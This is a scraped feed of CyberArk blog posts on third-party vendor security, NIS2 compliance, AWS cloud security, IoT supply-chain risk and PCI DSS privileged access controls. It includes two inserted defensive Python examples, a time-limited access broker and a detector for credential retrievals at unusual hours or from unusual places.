  • The buck stops with you. A vendor supply chain is a lot like an assembly line. Organizations bring on third parties to perform certain tasks because it’s cheaper or easier for them to do so. It can also look like a way around regulatory hurdles, since smaller third-party organizations are often not held to the same compliance obligations, though regulators are increasingly pushing those obligations down the supply chain. But the buck ultimately stops with your organization. Your third-party vendors become an extension of your organization, and you are only as strong as your weakest link. As such, your vendor selection choices matter, and trust – building it and keeping it – is the foundation of everything.
  • EXCEPT when it comes to security controls. Here, it’s best to remove trust from the equation entirely by enforcing Zero Trust access principles with zero exceptions. Authenticate your third-party users (and their devices) each time they require privileged access to your corporate systems. Bonus points if you can do so in a way that’s both secure and minimally bothersome for the end-user, like using biometrics.
  • Separate, separate, separate. Many organizations struggle with network topology. Just because a third-party vendor requires access to sensitive data and systems doesn’t mean they should get access to everything, which is something we see all too often. For this, network separation is the name of the game.
  • Don’t assume your internal controls match your third-party controls. For instance, your existing privileged access management solution may isolate and monitor employees’ privileged user sessions, but what about those of third-party staff and outside devices? Ensuring strong privileged access practices and policies extend across your supplier ecosystem isn’t just about risk reduction. FIPS 200, HIPAA, PCI DSS and many industry regulations require such controls.
  • Third-party vendor audits are important, but not fail-safe. Validating your vendors’ own internal security controls regularly is important for understanding whether their VPN systems are patched, whether unmanaged IoT devices sit on their network, how they’re securing their cloud environments and so on. But just because a company scores an A+ on a security assessment today doesn’t mean their security controls won’t slip tomorrow.
  • Consistency is key. To combat security controls erosion, promote consistency in your vendors’ security practices. For example, automated dynamic or per-session controls can help them eliminate long-standing access and validate least privilege enforcement continuously to reduce risk (along with headaches associated with manual provisioning).
  • Show me the data. Penetration testing and Red Team exercises reveal all kinds of issues you didn’t know you had. Your organization should conduct them, and your vendors should too. Ask third-party vendors to share their test results so you can address gaps in a collaborative, transparent manner.
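
One way to implement the per-session, time-bound controls described in the “Consistency is key” point above, as an added example (not CyberArk code): a small access broker that issues a grant scoped to one target and one set of actions, caps its lifetime by policy, requires both the identity and its device to be verified at issue time, and re-checks every request against the grant, so no vendor access survives as standing access. The user, target and action names, the verification flags and the TTL policy are assumptions made for the example.

```python
from __future__ import annotations

import secrets
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class Grant:
    """One vendor session's entitlement: who, to which target, which actions, until when."""
    token: str
    user: str
    target: str
    actions: frozenset[str]
    issued_at: datetime
    expires_at: datetime


class AccessBroker:
    """Issues short-lived, narrowly scoped grants and re-evaluates every request.

    Nothing here is standing access: a grant cannot outlive max_ttl, and each
    authorize() call re-checks expiry, target and action.
    """

    def __init__(self, max_ttl: timedelta = timedelta(hours=1)) -> None:
        self.max_ttl = max_ttl
        self._grants: dict[str, Grant] = {}
        self.audit: list[dict[str, str]] = []

    def _log(self, event: str, user: str, target: str, detail: str, now: datetime) -> None:
        self.audit.append({"event": event, "user": user, "target": target,
                           "detail": detail, "at": now.isoformat()})

    def issue(self, user: str, target: str, actions: set[str], ttl: timedelta,
              now: datetime, user_authenticated: bool, device_verified: bool) -> Grant:
        """Zero Trust at issue time: both the identity and its device must be verified."""
        if not (user_authenticated and device_verified):
            self._log("issue-denied", user, target, "identity or device unverified", now)
            raise PermissionError("identity and device must both be verified")
        if ttl > self.max_ttl:
            raise ValueError(f"requested ttl {ttl} exceeds policy maximum {self.max_ttl}")
        grant = Grant(token=secrets.token_urlsafe(24), user=user, target=target,
                      actions=frozenset(actions), issued_at=now, expires_at=now + ttl)
        self._grants[grant.token] = grant
        self._log("issue", user, target, f"actions={sorted(actions)} ttl={ttl}", now)
        return grant

    def authorize(self, token: str, target: str, action: str, now: datetime) -> bool:
        """Evaluate one request; an expired grant is dropped the first time it is seen."""
        grant = self._grants.get(token)
        if grant is None:
            self._log("deny", "unknown", target, "unknown or revoked token", now)
            return False
        if now >= grant.expires_at:
            del self._grants[token]
            self._log("deny", grant.user, target, "grant expired", now)
            return False
        if target != grant.target or action not in grant.actions:
            self._log("deny", grant.user, target, f"out of scope: {action}", now)
            return False
        self._log("allow", grant.user, target, action, now)
        return True

    def revoke(self, token: str, now: datetime) -> None:
        """Operator-initiated revocation mid-session."""
        grant = self._grants.pop(token, None)
        if grant is not None:
            self._log("revoke", grant.user, grant.target, "revoked by operator", now)

    def live_grants(self, now: datetime) -> list[Grant]:
        """What an access reviewer sees: only grants that have not yet expired."""
        return [g for g in self._grants.values() if now < g.expires_at]


def demo() -> dict[str, bool | int]:
    """Constructed scenario: one vendor session through issue, use, scope violation and expiry."""
    broker = AccessBroker(max_ttl=timedelta(hours=1))
    t0 = datetime(2022, 12, 15, 9, 0, tzinfo=timezone.utc)
    grant = broker.issue("vendor-alice", "db-prod-01", {"read"}, timedelta(minutes=30),
                         now=t0, user_authenticated=True, device_verified=True)
    results: dict[str, bool | int] = {
        "read_in_window": broker.authorize(grant.token, "db-prod-01", "read", t0 + timedelta(minutes=5)),
        "write_denied": broker.authorize(grant.token, "db-prod-01", "write", t0 + timedelta(minutes=6)),
        "other_host_denied": broker.authorize(grant.token, "db-prod-02", "read", t0 + timedelta(minutes=7)),
        "read_after_expiry": broker.authorize(grant.token, "db-prod-01", "read", t0 + timedelta(minutes=31)),
        "live_after_expiry": len(broker.live_grants(t0 + timedelta(minutes=31))),
    }
    # Policy violations at issue time: a TTL beyond policy, and an unverified device.
    for label, ttl, device_ok in (("long_ttl_rejected", timedelta(hours=8), True),
                                  ("unverified_device_rejected", timedelta(minutes=10), False)):
        try:
            broker.issue("vendor-bob", "db-prod-01", {"read"}, ttl,
                         now=t0, user_authenticated=True, device_verified=device_ok)
            results[label] = False
        except (ValueError, PermissionError):
            results[label] = True
    return results
```

The audit list is what session monitoring would consume: every allow, deny, issue and revoke carries the identity, target and reason, so an access review can show that nothing outlived its TTL and that every out-of-scope request was refused.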

As an organization, there is only so much you can do to mitigate third-party breaches like those seen this week. You cannot assume equivalent controls exist at your third-party organizations – another reason why assume breach is the logical cybersecurity approach. With this mindset, your priority shifts from preventing attacks to stopping them before they stop business. Embracing a proactive Identity Security strategy – which calls for defense-in-depth and paves the way for Zero Trust – and holding your third-party partners to the same standards, is critical to strengthening vendor supply chain security and measurably reducing risk.

Interested in learning more? See how your organization can secure third-party access to critical internal resources with full session isolation, monitoring and audit capabilities without the need for VPNs, passwords or agents.

An Identity Security Approach to NIS2 Readiness
https://www.cyberark.com/blog/an-identity-security-approach-to-nis2-readiness/ (Fri, 09 Dec 2022 14:00:01 +0000)

With its new and improved Network and Information Security Directive, NIS2, the European Union joins a growing list of governments around the world that are enacting stronger cybersecurity mandates to protect critical infrastructure.

NIS2 was formally adopted by EU Member States and the European Parliament last month. Now comes the complicated part: All 27 countries must transpose the Directive. Only time will tell exactly how NIS2 guidance gets folded into country-specific laws, such as KRITIS in Germany, or the rules governing opérateurs de services essentiels (OSE) in France. But recent attacks have made one thing clear: Traditional perimeter-based security models — conceived to control access to trusted enterprise networks — aren’t suited for the digital era. Consider that in 2022:

Zero Trust Architectures Protect Against Modern Cyber Threats

Today’s defenders must be able to verify, manage and secure identities continuously to prevent breaches. NIS2 guidance promotes Zero Trust principles, which assume that all identities (human and machine) are implicitly untrusted and must be authenticated and authorized regardless of network or location. Unlike a traditional perimeter-based security model, a Zero Trust architecture:

  • Protects cloud-based IT and OT systems as well as on-premises IT and OT systems
  • Defends against inside threats as well as external threats
  • Provides inherent security for remote workers and mobile users

As a core pillar of Zero Trust, Identity Security provides a consistent point of security control beyond the perimeter. It limits access to the human or machine identities that need it and only grants the minimum privileges required. This includes continuous authentication to validate a user’s entire session — not simply a single multifactor authentication request — and monitoring user behavior to identify when an identity has been compromised.

Identity Security to Improve NIS2 Readiness

If your organization falls within the scope of NIS2’s broadened parameters, reviewing these eight Identity Security steps can help you improve NIS2 preparations and advance Zero Trust initiatives:

1. Assess your security posture. Though security leaders say credential theft is their No. 1 area of risk, many organizations still assign and track identities manually, making it difficult to understand their true security posture. A security assessment can help identify areas of weakness, such as unmanaged passwords, misconfigured or dormant accounts or machines that are highly susceptible to credential theft attacks.

2. Take steps to safeguard privileged access. Adversaries exploit powerful, privileged accounts to orchestrate attacks, take down critical infrastructure and disrupt essential services. In response, NIS2 guidance promotes limiting administrator-level access accounts and regular password changes, among other foundational cyber hygiene recommendations. To fulfill requirements, covered entities will likely need to implement or strengthen privileged access management controls such as vaulting and rotating credentials, isolating privileged sessions and auditing privileged activities. Automating access decisions, for instance, by enabling just-in-time privileged access, can help streamline these compliance requirements while measurably reducing risk.

3. Proactively protect against ransomware. A 2022 European Union Agency for Cybersecurity (ENISA) report found that ransomware accounts for more than 10 terabytes of stolen data monthly. As ransomware attacks continue to increase in frequency and severity, Member States are urged to develop ransomware policies as part of their national cybersecurity strategies. In preparation for stricter security rules, it would be wise for organizations to focus on locking down critical endpoints (servers, VMs, etc.) by removing local admin rights and implementing policies that help prevent lateral movement and privilege escalation as part of a defense-in-depth approach.

4. Assume breach and put analytics to work. Breaches will happen — that’s a given. Detecting threats and responding quickly is key to minimizing the “blast radius” when they do. Consider how AI and machine learning can aid in risk modeling and scaling detection capabilities, for instance, to immediately spot when a privileged user suddenly tries to access credentials at an unusual time of day or from an unusual location.

5. Scrutinize your supply chain. Take a look at your current third-party vendor assessment, onboarding and ongoing risk management processes. Do you have a clear sense of how each vendor is securing its own systems and how they’re accessing your environment and sensitive resources? In particular, managed services providers (MSPs) have become prime attack targets because of their close integration with operations and warrant heightened scrutiny. Consider your third-party vendors’ DevSecOps practices as you consider your own: What steps are they taking to protect applications, automation tools and third-party software? It’s important to note that while NIS2 doesn’t directly cover many small businesses, they will be bound by the due diligence requirements that covered entities must apply across their supply chain ecosystem.

6. Formalize and test your incident response plan. NIS2 calls for faster incident reporting, with the first of several reports (an early warning) due to authorities within 24 hours of becoming aware of a significant incident. If you haven’t already, formalize an incident response plan and test it regularly. Like regulatory bodies, cyber insurance carriers are evaluating data backup practices and incident response plans to understand how quickly organizations can restore operations in the wake of an attack.

7. Prepare your people. The continued barrage of impersonation and spear-phishing attacks targeting high-value identity credentials necessitates a change in culture. Teams and departments must be regularly educated on cybersecurity best practices. If you haven’t rolled out a cybersecurity training program, now’s the time to do so.

8. Step up voluntary information sharing. Thankfully, not every threat results in theft or damage. Yet information sharing is an important part of critical infrastructure protection. Take advantage of intelligence from the threat research community, while doing your part to contribute information on indicators of compromise (IOCs) and vulnerabilities. Though this is not likely to become a compliance mandate, increased collaboration is key to moving cybersecurity forward.
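
Step 4 above describes spotting a privileged user who retrieves credentials at an unusual hour or from an unusual location. The following Python is an added example (not CyberArk code) of that detection logic run over constructed audit events: it learns each identity’s baseline hours, source countries and source networks from a learning window, then scores any credential retrieval that falls outside them, treating an identity with no baseline as its own signal. The audit field names, the `vault.retrieve` action, the ASNs and the thresholds are all assumptions.

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class AuditEvent:
    """One privileged-access audit record (constructed field names)."""
    user: str
    action: str    # e.g. "vault.retrieve" for a credential checkout
    hour: int      # hour of day, 0-23, UTC
    country: str   # source geolocation
    asn: str       # source network


@dataclass
class Baseline:
    """What is normal for one identity over the learning window."""
    hours: set[int] = field(default_factory=set)
    countries: set[str] = field(default_factory=set)
    asns: set[str] = field(default_factory=set)
    samples: int = 0


def hour_distance(a: int, b: int) -> int:
    """Circular distance on a 24-hour clock, so 23:00 and 00:00 are one hour apart."""
    d = abs(a - b) % 24
    return min(d, 24 - d)


class PrivilegedAccessDetector:
    """Learns where and when each identity normally retrieves credentials, then scores deviations."""

    def __init__(self, watched_action: str = "vault.retrieve",
                 min_samples: int = 5, hour_tolerance: int = 1) -> None:
        self.watched_action = watched_action
        self.min_samples = min_samples      # below this, an identity has no trusted baseline
        self.hour_tolerance = hour_tolerance
        self.baselines: dict[str, Baseline] = defaultdict(Baseline)

    def learn(self, history: list[AuditEvent]) -> None:
        for ev in history:
            if ev.action != self.watched_action:
                continue
            b = self.baselines[ev.user]
            b.hours.add(ev.hour)
            b.countries.add(ev.country)
            b.asns.add(ev.asn)
            b.samples += 1

    def score(self, ev: AuditEvent) -> tuple[int, list[str]]:
        """One point per deviation; a cold-start identity scores one point by itself."""
        if ev.action != self.watched_action:
            return 0, []
        b = self.baselines.get(ev.user)
        if b is None or b.samples < self.min_samples:
            return 1, ["no established baseline for identity"]
        reasons: list[str] = []
        if all(hour_distance(ev.hour, h) > self.hour_tolerance for h in b.hours):
            reasons.append(f"unusual hour {ev.hour:02d}:00 UTC")
        if ev.country not in b.countries:
            reasons.append(f"new country {ev.country}")
        if ev.asn not in b.asns:
            reasons.append(f"new source network {ev.asn}")
        return len(reasons), reasons

    def alerts(self, events: list[AuditEvent],
               threshold: int = 2) -> list[tuple[AuditEvent, int, list[str]]]:
        """Events at or above the threshold, ready for a responder or a step-up MFA hook."""
        out = []
        for ev in events:
            s, why = self.score(ev)
            if s >= threshold:
                out.append((ev, s, why))
        return out


def demo() -> list[tuple[str, int, list[str]]]:
    """Constructed history for one admin (office hours, one network), then a day of mixed activity."""
    history = [AuditEvent("ops-admin", "vault.retrieve", h, "DE", "AS3320")
               for h in (8, 9, 11, 14, 16, 17, 9, 13)]
    detector = PrivilegedAccessDetector()
    detector.learn(history)
    today = [
        AuditEvent("ops-admin", "vault.retrieve", 10, "DE", "AS3320"),  # routine
        AuditEvent("ops-admin", "vault.retrieve", 18, "DE", "AS3320"),  # one hour past baseline: tolerated
        AuditEvent("ops-admin", "vault.retrieve", 3, "DE", "AS3320"),   # odd hour only
        AuditEvent("ops-admin", "vault.retrieve", 3, "BR", "AS26599"),  # odd hour, new country, new network
        AuditEvent("new-hire", "vault.retrieve", 10, "DE", "AS3320"),   # no baseline yet
        AuditEvent("ops-admin", "session.open", 3, "BR", "AS26599"),    # not the watched action
    ]
    return [(ev.user, s, why) for ev, s, why in detector.alerts(today, threshold=1)]
```

The threshold is the tuning knob: at 1 every deviation pages someone, at 2 only the combined off-hours-plus-new-location retrieval does, which is the kind of event step 4 has in mind. In production the baseline would be rebuilt on a rolling window and the score would feed a step-up authentication or session termination decision rather than just a list.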

If you’re looking for more tips on assessing your organization’s current strategy and tackling identity-related risk to meet NIS2 compliance requirements, check out the CyberArk Blueprint for Identity Security Success.

Our team will continue to track NIS2-related developments to help EU businesses navigate changing compliance requirements. If you have questions in the meantime, please get in touch — we’re here to help.

For in-depth guidance on preparing for NIS2, read our whitepaper and watch our webinar series.

NIS2 to Boost Cybersecurity Requirements for Many EU Businesses
https://www.cyberark.com/blog/nis2-to-boost-cybersecurity-requirements-for-many-eu-businesses/ (Thu, 08 Dec 2022 14:00:00 +0000)

On November 28, 2022, the Council of the EU gave final approval to NIS2, the successor to the European Union’s Network and Information Security (NIS) Directive, heralding significant compliance changes for many EU businesses once the Directive is transposed into national law. This long-anticipated revamp aims to enhance critical infrastructure resilience and align cybersecurity efforts across the EU.

Read on to learn how and why EU cybersecurity regulations are changing, and if your organization is covered under NIS2.

NIS vs. NIS2: What’s Changed

The original NIS Directive was the first EU-wide piece of cybersecurity legislation. First adopted in 2016, the Directive represented a major step forward. Yet over the years, it proved difficult to implement consistently. NIS2 encompasses six major changes to address these challenges and respond to growing threats posed by digitalisation, including:

1. A broader scope. The list of sectors covered by NIS2 is much longer than before, meaning many more EU businesses must take note. NIS2 also spells out which entities within those sectors are subject to requirements, using a size cap: as a rule, medium-sized and large entities are covered, meaning those with at least 50 employees or an annual turnover and balance sheet above EUR 10 million. Large entities (250 or more employees, or an annual turnover above EUR 50 million or a balance sheet above EUR 43 million) are the ones most likely to be designated essential. And in certain circumstances, entities must comply irrespective of company size, such as providers of public electronic communications networks.

Member States must then identify which in-scope entities are “essential” (e.g., critical infrastructure operators, certain large manufacturers) or “important” (e.g., digital service providers, managed service providers), following the Directive’s criteria. Both groups must meet the same security and reporting requirements, but “essential” entities face stricter, proactive supervision and enforcement.

2. Strengthened security requirements. NIS2 introduces a set of baseline cybersecurity measures that each covered entity must address. These include risk analysis and information system security policies, incident response, business continuity and crisis management, supply chain security, assessment of effectiveness of risk management measures, and encryption and vulnerability disclosure.

3. Enhanced collaboration. NIS2 rules aim to increase trust, information sharing and coordinated management of large-scale cybersecurity incidents at the EU level. The European Cyber Crisis Liaison Organization Network (EU CyCLONe) was established to specifically support these efforts.

4. Faster incident reporting timelines. NIS2 clarifies obligations with more precise provisions on the disclosure process, content and timeline. Notably, impacted companies must send an early warning to authorities within 24 hours of becoming aware of a significant incident, a fuller incident notification within 72 hours, and a final report within one month.

5. Steeper penalties for non-compliance. For essential entities, non-compliance fines can reach up to two percent of global annual turnover or EUR 10 million, whichever is higher; for important entities the ceiling is 1.4 percent or EUR 7 million.

6. “Management body” oversight and accountability. For the first time, NIS2 specifically places an obligation on “management bodies” (including C-Suite members) for implementing and complying with heightened security measures and alludes to potential consequences for failure to do so.

Expanded NIS2 Guidance Addresses Current Risks and Future Challenges

NIS2 guidance reflects a rapidly changing threat landscape that looks nothing like it did back in 2016. For instance, many utilities and manufacturers are now converging operational technology (OT) networks and information technology (IT) networks to simplify operations and reduce costs.

Historically, OT and IT networks operated independently. Industrial control traffic flowed over a dedicated OT network using industry-specific supervisory control and data acquisition (SCADA), energy management system (EMS) and manufacturing execution system (MES) protocols. Business application traffic flowed over a separate enterprise IP network that connected to the public internet. An external threat actor who breached the enterprise network had no network path onward to the OT systems. Increased convergence eliminates that “air gap” between the two environments, giving an attacker who lands on the IT network a route to industrial control systems and a chance to wreak havoc.

Critical infrastructure operators are also shifting away from proprietary hardware and special-purpose software toward standards-based OT — think Linux-based commodity servers and commercial-off-the-shelf software that are much easier to work with. Unfortunately, this also makes systems more vulnerable to software supply chain attacks, as the infamous SolarWinds breach showed the world.

As the European Commission notes, “Now any disruption, even one initially confined to one entity or one sector, can have cascading effects more broadly, potentially resulting in far-reaching and long-lasting negative impacts in the delivery of services across the whole internal market.”

The risks brought on by digitalisation are many. It’s now common for OT and Internet of Things (IoT) endpoints to connect over the internet, while applications are often deployed in the cloud — far beyond the secure confines of the enterprise network border. What’s more, many workers have gone remote for good, and system administrators (both employees and third parties) routinely manage critical infrastructure from remote locations.

For all these reasons and more, the need for a consistent point of security control beyond the perimeter is critical for defending critical infrastructure against devastating cyberattacks. NIS2 architects recognize this, and advocate for a Zero Trust cybersecurity model that assumes all human and machine identities are implicitly untrusted and must be authenticated and authorized regardless of their location.

Now that NIS2 has been officially enacted, member States have until October 2024 to transpose the Directive into their own national laws, at which time many EU businesses will need to comply with country-specific requirements.

In part two of this NIS2 post, we’ll explore Identity Security best practices that can help critical infrastructure operators, service providers and suppliers prepare for upcoming NIS2 compliance requirements, while strengthening cybersecurity and reducing risk.

For in-depth guidance on preparing for NIS2, read our whitepaper and watch our webinar series.

Cloud Migration On Your Identity Security Terms
https://www.cyberark.com/blog/cloud-migration-on-your-identity-security-terms/ (Fri, 02 Dec 2022 20:08:29 +0000)

The public cloud is empowering organizations to do incredible things, from exploring new realms in space to transforming cultures. This week at AWS re:Invent in Las Vegas, these real-world cloud innovation stories were on full display.

“Technology has changed how we explore our imagination together,” said Amazon Web Services (AWS) CEO Adam Selipsky in his keynote. “The world is all one neighborhood, and we can all come out and play.”

Companies of all sizes continue flocking to the cloud for its many business benefits: Reduced infrastructure costs, increased flexibility and more dynamic application development, to name a few. Selipsky shared how Airbnb — a company hit particularly hard by the pandemic — took advantage of cloud scalability to help weather the storm and make a remarkable comeback.

Virtually every organization now uses the cloud for some facet of their business — and most companies want to do even more. Especially now, “Businesses are leaning in [to the cloud] as we face economic uncertainty,” said Selipsky. “It can help them be prepared for anything.” He expects cloud adoption will continue to surge over the next five years, in which time the amount of data worldwide will double in a “data explosion.”

Explosive Cloud Growth Brings Benefits and Complications

But with “explosive” data growth come new security challenges. Leading cloud service providers (CSPs) like AWS have combined decades of innovation and technology to deliver modern platforms. And they continue to expand their offerings — from compute infrastructure like virtual machines (VMs), containers and services, to databases and other supporting IT assets — to help organizations achieve their goals even faster.

For one, there simply aren’t enough skilled cloud professionals to keep pace with this evolution. A recent study commissioned by AWS and Cloudreach found more than 70% of global IT leaders view the skills gap as an urgent concern, 46% believe it’s slowing them down and nine percent describe it as an “existential crisis” for their companies.

Even with highly skilled professionals at the helm, cloud migrations can be complicated, and can even create friction between functional groups. For example, development teams may be eager to forge ahead quickly to accelerate their cloud-native DevOps practices, while security teams may want to proceed more slowly. As the latter team evaluates potential impact on existing environments, new risks and increased security management requirements, their caution is warranted. For security teams taking on the cloud, Uncle Ben Parker’s famous advice to the young Peter Parker (aka Spider-Man) rings true: With great power comes great responsibility.

With Great (Cloud) Power Comes Great Responsibility

AWS operates under a shared responsibility model in which the CSP is responsible for security of the cloud, while cloud customers are responsible for security within the cloud.

This means customer organizations’ cybersecurity teams are responsible for proper configurations within their own environments. Here’s a concrete example from the Identity Security world: for a virtual machine (VM) in a customer environment, the CSP patches the underlying hosts and hypervisor, but it’s up to the customer to patch the guest operating system and to configure Identity Security controls for access to that VM, such as requiring multifactor authentication or implementing least privilege.

As such, security practitioners have the uniquely challenging job of embracing the cloud to enable the business, while preserving people, process and technology best practices learned on-premises.

Finding the right balance between control and access in cloud environments is crucial, said Selipsky in his keynote. Establishing the right security governance encourages innovation.

Don’t Reinvent the Wheel. Keep Identity Security Simple to Eliminate Cloud Migration Friction

Fortunately, CSPs are investing heavily to increase the flexibility of their services. This makes it possible for customer organizations to use their existing security tools and workflows in their cloud environments. In practical terms, this means security teams don’t have to learn another system, toggle between another interface or hire specialized experts to bridge skills gaps. Interoperability also enhances risk reduction efforts by helping security teams stay ahead of attackers, maintain centralized security control and meet end-users’ requirements for speed and ease of use.

This week at AWS re:Invent, the world’s largest CSP continued to unveil ground-breaking cloud services and innovations. Several new security offerings center on this interoperability concept, enabling organizations operating hybrid environments to integrate and extend their existing Identity Security controls to new AWS services, among other proven cybersecurity practices.

CyberArk was a launch partner for two of these new security services:

  • Amazon Security Lake: CyberArk Audit, an Identity Security Platform Shared Service, now delivers security event information to Amazon Security Lake. Organizations interested in leveraging a security data lake through AWS can now pull in security event findings from CyberArk’s audit service, which collects session recordings and audit information for a variety of identities accessing sensitive systems across hybrid cloud environments. This integration allows organizations to holistically review their security and audit data, enabling operational efficiencies and improving analysis of security events.
  • AWS Verified Access: CyberArk Identity can now provide identity-related signals for AWS Verified Access — a new AWS service that delivers secure access to private applications hosted on AWS without a VPN. Organizations can now manage all user information, credentials, authentication and role access for AWS in CyberArk Identity as a single source of truth. This enables them to realize all benefits of AWS Verified Access without needing to change their Identity Provider (IdP) or make additional investments in the identity management infrastructure.

We believe security teams work hard enough. They shouldn’t have to reinvent the wheel to reap cloud benefits or defend their hybrid environments from attacks. These launches reflect a broader trend and much-welcomed emphasis on interoperability in cloud security. And our CyberArk team is proud to play a part in this effort.

Interested in extending your organization’s existing Identity Security controls and practices to your AWS environment? CyberArk offers more than 20 certified integrations (and counting) with AWS services. Explore them all on the CyberArk Marketplace.
]]>
How the IoT Intensifies Software Supply Chain Risks https://www.cyberark.com/blog/how-the-iot-intensifies-software-supply-chain-risks/ Fri, 02 Dec 2022 14:00:14 +0000 https://www.cyberark.com/?p=137198 How IoT Intensifies Software Supply Chain Risks

The world of Internet of Things (IoT) devices is both fanciful and ubiquitous, from routers and smart appliances popular at home to intelligent building systems and self-monitoring industrial assets that power business. While these connected devices deliver countless benefits, they also represent a major attack vector and data privacy nightmare. And in recent years, SolarWinds, Verkada and other large-scale cyberattacks have brought IoT software supply chain risks into sharper focus.

Hardcoded and Weak Credentials Invite IoT Exploits

Many IoT and operational technology (OT) devices use default credentials that are hardcoded (or embedded) by the manufacturer. This may seem shocking, but it’s also understandable: Digital transformation has brought thousands of IoT devices to the modern enterprise, making IoT credential management costly and complicated. Even when default credentials are changed, they’re often easy to crack due to poor practices like weak password selection, credential sharing or reuse and infrequent rotation. Attackers can use these credentials to access vulnerabilities within IoT system software and firmware (which are plentiful) and move deeper into company systems and supply chains.

Credentials for application access accounts — powerful privileged accounts that enable machine-to-machine interaction — are especially popular targets. By exploiting a vulnerability in an IoT device’s software, an adversary could use an application account to implant malicious software into a legitimate product that’s later deployed by thousands of organizations around the world. Or an attacker could use an organization’s own digital signature system to assert the safety and reliability of a vendor’s product, even after implanting malware in the victim application.

To minimize these risks, all IoT device credentials and secrets should be stored and managed in a secure vault (never hardcoded), and access for every IoT device on the network should be consistently managed and audited.

IoT Firmware Updates Are Few and Far Between

Many IoT deployments lack built-in secure software and firmware update capabilities. This makes it very difficult for security teams to patch vulnerabilities in a timely manner — especially at scale. Sometimes years or even decades go by without an update. This could leave anything from hotel door locks to life-saving medical equipment to critical utility infrastructure vulnerable to attacks.

Meanwhile, threat actors are finding new ways to hijack firmware updates when they are pushed. By weaponizing routine or fake patches with malicious code or surreptitiously changing application functionality to bypass security mechanisms, they work to scale their attacks by orders of magnitude.

Limited IoT Visibility Leads to Lots of Guesswork

Another big part of the IoT security issue stems from lack of visibility. Organizations struggle to even identify all the IoT and OT devices existing on their network — let alone patch and manage them effectively throughout the full lifecycle. Just 29% of IT security professionals say their organizations have a complete inventory of their IoT and OT devices, according to a recent Ponemon Institute study. Forty-one percent say their organizations primarily use manual processes to identify and correlate compromised IoT and OT devices to attacks.

Automation can lighten the load and provide much-needed clarity, for instance, by continuously scanning for new devices on the network. And by automatically changing default credentials, rotating passwords and updating device firmware, security teams can save valuable time while improving device protection and compliance with company policies.

Recent Steps Raise Public Awareness of IoT Risks in the Software Supply Chain

The ongoing spate of IoT-related incidents and supply chain attacks has prompted both government and industry to get serious about closing these gaps.

In October 2022, the Biden administration unveiled a plan to develop an IoT risk-rating and labeling system for common household devices — a cyber variation of the popular “Energy Star” program that helps consumers make informed purchasing decisions. A few weeks later, U.S. government agencies released guidance for enterprise customers on procuring and deploying third-party software as part of a broader effort to strengthen resiliency across the digital ecosystem.

These recent steps build on the work of the National Institute of Standards and Technology (NIST) and the private sector to step up IoT regulations and scrutinize IoT software components against stricter cybersecurity standards — and are collectively driving change. For example, tighter restrictions have prompted aviation companies to seek ways to reliably inventory IoT fleets and keep interconnected avionics devices and sensors up to date. This industry is also focused on protecting IoT applications developed in-house from unauthorized access and tampering, and on enhancing processes to verify software and firmware release integrity.

There’s still much work ahead, as the same Ponemon Institute study shows. Within the past two years, 35% of organizations have experienced a cyber incident in which an IoT device was used to conduct a broader attack. IoT devices can be game-changing. But without a consistent approach for managing devices and their underlying systems, IoT can become a red zone for cybersecurity risk, and potentially trigger a destructive domino effect downstream.

]]>
Meet PCI DSS and Protect Cardholder Data with PAM Controls https://www.cyberark.com/blog/meet-pci-dss-and-protect-cardholder-data-with-pam-controls/ Wed, 23 Nov 2022 14:00:17 +0000 https://www.cyberark.com/?p=136578 Meet PCI DSS and Protect Cardholder Data with PAM Controls

The 2022 holiday online shopping season is shaping up to be a busy one. An estimated 63.9 million people will shop this Cyber Monday, while global eCommerce transactions are expected to climb 15% from October through December 2022 and reach up to $264 billion. Unfortunately, when eCommerce sales surge, credit card fraud and data theft do too.

According to the Internet Crime Complaint Center, credit card fraud accounted for $173 million in losses in 2021. It’s one of the reasons consumers can now mask their credit card numbers when purchasing from an unknown online website. But that’s not enough — especially since holiday scams often target merchants as well.

If your business handles credit or debit card information, now is the time to revisit the Payment Card Industry Data Security Standard (PCI DSS) guidelines to help protect your organization, safeguard customer data, preserve trust and avoid hefty penalty fees.

PCI DSS 4.0 Compliance Goals and Requirements at a Glance

Retailers, processors, service providers and any other businesses that accept major payment cards and store, process and/or transmit cardholder data electronically must follow the PCI DSS guidelines and provide annual evidence of compliance. The global security standard is intended to help protect all parties involved in online transactions against damaging cyberattacks: Cardholders, by safeguarding confidential data, and merchants, by mitigating security vulnerabilities and risk such as unauthorized data access and disclosure.

PCI DSS 4.0 is the latest version published by the Payment Card Industry Security Standards Council, the standard’s governing body. It defines six principal goals and 12 high-level requirements and best practices for securing network and system infrastructure and protecting confidential cardholder data:

As part of these goals, PCI DSS defines strong access control measures and multifactor authentication (MFA) methods to help prevent threat actors from breaching IT systems and stealing confidential cardholder data. Notably, the standard requires merchants to monitor and control access to all administrative accounts on point-of-sales (POS) terminals and any other systems that manage cardholder data.

Addressing Key PCI DSS Requirements with Strong Privileged Access Management Controls

Cybercriminals routinely look for ways to exploit privileged credentials — including those for administrative accounts on IT systems that handle credit card and debit card transactions — to orchestrate attacks and steal sensitive data. Especially during the hectic holiday season, distracted workers, lax credential management practices and error-prone manual security processes provide them with ample opportunity.

Because of this, PCI DSS recommends that merchants consider using a privileged access management (PAM) solution to restrict access to privileged accounts and defend against data breaches. Cloud infrastructure entitlements management (CIEM) solutions similarly help organizations reduce excessive permissions across systems hosting data in their cloud environments — satisfying another key PCI DSS requirement to implement least privilege access.

These controls can provide the foundation of a comprehensive Identity Security approach and the key to satisfying the following PCI DSS requirements:

Privileged access management controls work in concert to improve visibility and control over privileged accounts, isolate and monitor privileged sessions and help to prevent unauthorized access.

By embracing an Identity Security strategy centered on intelligent privileged access management controls, your organization can strengthen its overall security posture and protect confidential data — throughout the busy 2022 holiday season and beyond.

PCI DSS Resources to Help You Get Started

There are many great industry resources available to organizations looking to get up to speed on PCI DSS technical specifications, attestation processes and reporting requirements. Major credit card brands including American Express, Discover, Mastercard and Visa offer free online training programs and support. The PCI Security Standards Council also provides numerous resources on how to keep payment data safe. And to learn how CyberArk helps organizations defend against attacks and improve PCI DSS compliance, check out our latest eBook, “How Privileged Access Management Protects Cardholder Data.”

]]>
2023 Cybersecurity Predictions from CyberArk Labs https://www.cyberark.com/blog/2023-cybersecurity-predictions-from-cyberark-labs/ Mon, 21 Nov 2022 12:44:18 +0000 https://www.cyberark.com/?p=136556

